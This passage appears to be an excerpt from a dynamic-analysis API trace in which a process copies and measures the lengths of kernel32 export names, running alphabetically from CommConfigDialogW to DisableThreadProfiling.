returned="CommConfigDialogW" [0079.000] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.000] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.000] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.000] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.000] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.001] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.001] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.001] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.001] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.001] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.001] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.001] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.001] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.001] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.001] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.001] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.001] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.001] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.001] lstrlenA (lpString="COPYFILEA") returned 9 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.001] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.001] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.001] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.001] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.001] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.002] lstrlenA (lpString="COPYFILEW") returned 9 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.002] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.002] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.002] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.002] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.002] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.002] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.002] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.002] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.002] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.002] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.002] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.002] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.002] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.002] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.002] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.002] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.002] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.002] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.002] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.003] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.003] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.003] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.003] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.003] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.003] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.003] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.003] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.003] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.003] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.003] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.003] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.003] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.003] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.003] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.003] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.003] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.003] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.003] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.004] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.004] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.004] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.004] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.004] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.004] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.004] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.004] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.004] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.004] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.004] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.004] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.004] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.004] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.004] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.004] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.004] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.004] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.004] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.004] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.005] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.005] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.005] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.005] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.005] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.005] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.005] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.005] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.005] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.005] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.005] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.005] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.005] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.005] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.005] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.005] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.005] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.005] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.005] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.005] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.006] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.006] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.006] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.006] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.006] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.006] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.006] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.006] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.006] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.006] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.006] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.006] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.006] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.006] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.006] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.006] lstrlenA (lpString="DELETEATOM") returned 10 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.006] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.006] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.006] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.007] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.007] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.007] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.007] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.007] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.007] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.007] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.007] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.007] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.007] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.007] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.007] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.007] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.007] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 